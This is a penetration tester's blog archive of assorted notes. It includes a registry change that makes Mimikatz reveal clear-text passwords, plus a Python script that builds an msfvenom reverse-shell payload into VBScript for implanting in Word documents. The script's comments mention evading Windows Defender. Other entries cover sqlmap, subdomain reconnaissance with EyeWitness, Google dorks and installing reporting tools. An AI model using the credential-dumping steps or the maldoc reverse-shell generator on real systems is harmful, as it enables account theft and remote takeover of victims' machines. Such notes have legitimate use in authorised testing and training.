Category Archives: Uncategorized
Deliberately Show Clear-text Credentials in Mimikatz Output
For some demonstration purpose, you might want to show the clear-text passwords from Mimikatz.
Step 1) Run the command below as Admin on victim machine
reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0x00000001
Step 2) Restart the victim machine
Step 3) Run mimikatz, get clear-text credentials.
VBScript Python Script
# This Python script can be used to generate VBScript reverse shell to be implanted in Word documents # Problem is, Windows defender detects the VBScript as malicious, so I need to find a way to obfuscate further import subprocess #Get input for IP Address and listening port ipaddress = input("Input listening IP Address: ") lport = input("Input listening port: ") # Run msfvenom to get a reverse shell VBScript command1 = [ 'msfvenom', '-p', 'windows/shell_reverse_tcp', f'LHOST={ipaddress}', f'LPORT={lport}', '-f', 'hta-psh', '-o', '/tmp/rev.hta' ] subprocess.run(command1) # Read the content of /tmp/rev.hta, cut it, and grep it try: cat_command = subprocess.Popen(['cat', '/tmp/rev.hta'], stdout=subprocess.PIPE) cut_command = subprocess.Popen(['cut', '-d', '"', '-f', '2'], stdin=cat_command.stdout, stdout=subprocess.PIPE) grep_command = subprocess.Popen(['grep', 'powershell.exe -nop'], stdin=cut_command.stdout, stdout=subprocess.PIPE) # Get the output of the last command in the pipeline output = grep_command.communicate()[0].decode('utf-8') except subprocess.CalledProcessError as e: print("Error running the commands:", e) # Prepare /home/kali/Desktop/reverseshell.vbscript try: with open('/home/kali/Desktop/reverseshell.vbscript', 'a') as g: g.write('Dim Str As String\n') print('\nreverseshell.vbscript successfully created on /home/kali/Desktop/') except FileNotFoundError: print("Error at beginning of script") # Cut the output of the vbscript to 50 characters per line # Then input into /home/kali/Desktop/reverseshell.vbscript n = 50 for i in range(0, len(output), n): try: with open('/home/kali/Desktop/reverseshell.vbscript', 'a') as f: f.write("Str = Str + " + '"' + output[i:i+n] + '"' +'\n') except FileNotFoundError: print("The directory does not exist") f.close() # Close off reverseshell.vbscript try: with open('/home/kali/Desktop/reverseshell.vbscript', 'a') as g: g.write('\nCreateObject("Wscript.Shell").Run Str') except FileNotFoundError: print("Error at end of script") g.close() # Delete /tmp/rev.hta command2 = ['rm', '/tmp/rev.hta'] subprocess.run(command2) # Print completion status print('\nScript complete, please cat /home/kali/Desktop/reverseshell.vbscript')
sqlmap POST request
- Intercept a POST request in Burp Suite > right click > Copy to File
- sqlmap -r <filename> -p <parameter to test> –proxy=http://127.0.0.1:8080 –batch
PwnDocs Troubleshooting
- Recompile PwnDocs docker after making changes to javascript
sudo docker-compose down
sudo docker-compose up -d –build
- Troubleshoot errors in PwnDocs
sudo docker container ls
sudo docker container logs <CONTAINER ID>
Installing PwnDocs in Kali
sudo git clone https://github.com/pwndoc/pwndoc.git
sudo apt-get install docker
sudo apt install docker.io
sudo apt-get install npm
sudo apt install docker-compose
sudo mousepad pwndoc/frontend/Dockerfile
Replace “FROM node:lts-alpine” AS build with “FROM node:16-alpine AS build”
cd pwndoc
sudo docker-compose up -d –build
sudo docker-compose start
Access https://localhost:8443 via web browser
Using yq
yq is a YAML parser that can also be used to convert JSON to YAML files
Install into Kali using the following steps
sudo wget https://github.com/mikefarah/yq/releases/download/{version}/yq_linux_amd64 -O /usr/bin/yq
sudo chmod +x /usr/bin/yq
![](https://benleeyr.wordpress.com/wp-content/uploads/2023/01/image-3.png?w=457)
Convert from JSON to YAML using the following command
yq -P file.json
Using jq
jq is used to filter / manipulate JSON files
Install using sudo apt-get install jq
First, ensure that the JSON file starts with something like so:
![](https://benleeyr.wordpress.com/wp-content/uploads/2023/01/image-1.png?w=529)
To pull out specific content, use the following command
cat file.json | jq -r ‘.test[] | .a + “\n” + .ac + “\n” + .affected_hosts + “\n” + .affected_users + “\n”‘
If a field is a number that you want to convert to string
cat file.json | jq -r ‘.test[] | .a + “\n” + .ac + “\n” + .affected_hosts + “\n” + (.affected_users|tostring) + “\n”‘
Website Accessibility Hunting
- Download EyeWitness
- git clone https://github.com/FortyNorthSecurity/EyeWitness
- cd EyeWitness/Python
- Get list of URLs via crt.sh
- sudo dnsrecon –iw -d DOMAIN-t crt | grep “DOMAIN” | cut -d ‘ ‘ -f 4 | sort -u > list.txt
- Inspect list.txt for non-required entries, manually remove (to improve with SED next time)
- Use EyeWitness to scan sites from list.txt, then output to /home/kali/Desktop/DOMAIN/eyewitness/
- ./EyeWitness.py –web -f /home/kali/Desktop/BugBounty/DOMAIN/hosts.txt –user-agent “vdptest” –prepend-https -d /home/kali/Desktop/BugBounty/DOMAIN/urls_eyewitness
- Press “Y” to view the report when prompted
Note if copy pasting commands:
Retype –iw, as — is combined into one long –
Retype ” and ‘ as they do not paste correctly
Google Dorks Tips
site: To force searches into that specific site
inurl: To return only results that have that text in the URL
filetype: to return only results with the specific filetype
-inurl: to remove results that have that text in the URL